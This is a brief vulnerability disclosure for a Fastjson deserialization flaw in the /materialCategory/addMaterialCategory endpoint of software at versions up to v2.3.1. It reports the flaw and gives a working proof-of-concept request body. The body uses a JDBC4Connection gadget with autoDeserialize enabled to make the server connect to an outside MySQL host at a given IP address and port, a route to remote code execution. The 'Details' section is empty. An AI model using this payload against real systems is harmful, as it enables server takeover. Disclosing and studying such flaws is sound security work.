The /materialCategory/addMaterialCategory endpoint is vulnerable to a Fastjson deserialization attack.
Vulnerable Versions: <= v2.3.1
Vulnerable Endpoint: /materialCategory/addMaterialCategory
Proof of Concept (POC):
1 | info={"parentName":"","parentId":"","name":{"@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"120.26.138.45","portToConnectTo":3308,"info":{"user":"user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS":"1"},"databaseToConnectTo":"d645873","url":"XXX"},"id":"","serialNo":"2","sort":"3","remark":"4"} |
Details: